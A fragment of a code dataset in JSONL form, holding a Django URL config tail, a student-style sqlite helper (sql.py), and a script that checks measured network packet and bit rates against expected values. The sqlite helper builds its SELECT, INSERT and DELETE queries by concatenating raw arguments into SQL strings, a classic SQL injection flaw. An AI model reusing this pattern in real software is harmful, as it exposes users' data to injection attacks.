name=\"success\"),\n # 会员二维码\n url(r'^membersimage', MembersImageView.as_view(), name=\"members_image\"),\n # 批量获取已绑定微信会员的unicode\n url(r'^membersunionid', MembersUnionid.as_view(), name=\"members_unionid\")\n]\n","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"88959294","text":"#!/usr/bin/env python3\n#By Dr.ZCH\n\nimport sqlite3\n\nconn=sqlite3.connect('test.db')\nconn.execute('pragma foreign_keys=ON')\nconn.execute('pragma primary_keys=ON')\n\ndef header(table):\n header=[]\n if table:\n cursor=conn.execute('pragma table_info('+table+')')\n \n for row in cursor:\n header.append(row[1])\n return header\ndef content(table):\n content=[]\n if table:\n cursor=conn.execute('select * from '+table+';')\n \n for row in cursor:\n content.append(row)\n return content\n\ndef s(sid):\n cursor=conn.execute('select * from s where sid=\"'+sid+'\";')\n s=[]\n for row in cursor:\n s.append(row)\n return s\n\ndef c(sid):\n cursor=conn.execute('select * from c where cid in (select sc.cid from sc where sc.cid=c.cid and sid=\"'+sid+'\");')\n c=[]\n for row in cursor:\n c.append(row)\n return c\ndef sc(sid):\n cursor=conn.execute('select * from sc where sid=\"'+sid+'\";')\n c=[]\n for row in cursor:\n c.append(row)\n return c\ndef x(sid,cid):\n cursor=conn.execute('insert into sc(sid,cid) VALUES(\"'+sid+'\",\"'+cid+'\");')\n return c(sid)\ndef t(sid,cid):\n cursor=conn.execute('delete from sc where sid=\"'+sid+'\" and cid=\"'+cid+'\";')\n return c(sid)\n","sub_path":"gui_sql/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435945819","text":"#!/bin/python\nimport subprocess\nfrom sys import argv\n\ndef main():\n\tif len(argv) != 5:\n\t\tprint(\"Please use as $ \" + argv[0] + \" [Duration] [Packet Rate] [Bit Rate] [Interface]\")\n\t\texit()\n\n\tduration = float(argv[1]) # -3 because we neglect first and last two recordings\n\tpacket_rate = int(argv[2])\n\tbit_rate = int(argv[3])\n\tinterface = argv[4]\n\n\tlines = subprocess.check_output([\"./get_net_usage/get_net_usage\", interface, \\\n\t\t\t\t\t\t\t\t\t \"-t\", \"1\", \"-X\", \"2\"])\n\tlines = lines.strip().split(\"\\n\")\n\t\n\t\"\"\"\n\tExplaining lines[2:-4]\n\t- lines[0] is a notification\n\t- lines[-1] is a notification\n\t- lines[1] is sometimes inaccurate being the first entry\n\t- lines[-2] is sometimes inaccurate being the last entry\n\t- lines[-3] & lines[-4] are used to track zero traffic to stop the program\n\t\"\"\"\n\tlines = lines[2:-4]\n\n\tpack_rate_av = 0.0\n\tbit_rate_av = 0.0\n\tfor line in lines:\n\t\tline = line.split(\" \")\n\t\tpack_rate_av += float(line[4])\n\t\tbit_rate_av += float(line[2])\n\n\t# Post recording calculations\n\tduration -= (duration - len(lines)) # Compensates for lines[2:-4]\n\tpack_rate_av /= duration\n\tbit_rate_av /= duration\n\t\n\tprint(\"Expected Packet Rate: {} | Actual Packet Rate: {}\"\\\n\t\t .format(packet_rate, str(pack_rate_av)))\n\tprint(\"Difference: {} | Accuracy: {}%\".format\\\n\t\t(round(packet_rate - pack_rate_av, 2), round((pack_rate_av / packet_rate) * 100, 2)))\n\tprint(\"Expected Bit Rate: {} | Actual Bit Rate: {}\"\\\n\t\t .format(bit_rate, bit_rate_av))\n\tprint(\"Difference: {} | Accuracy: {}%\".format\\\n\t\t(round(bit_rate - bit_rate_av, 2), round((bit_rate_av / bit_rate) * 100, 2)))\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"Tests/evalMaceNorm.py","file_name":"evalMaceNorm.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}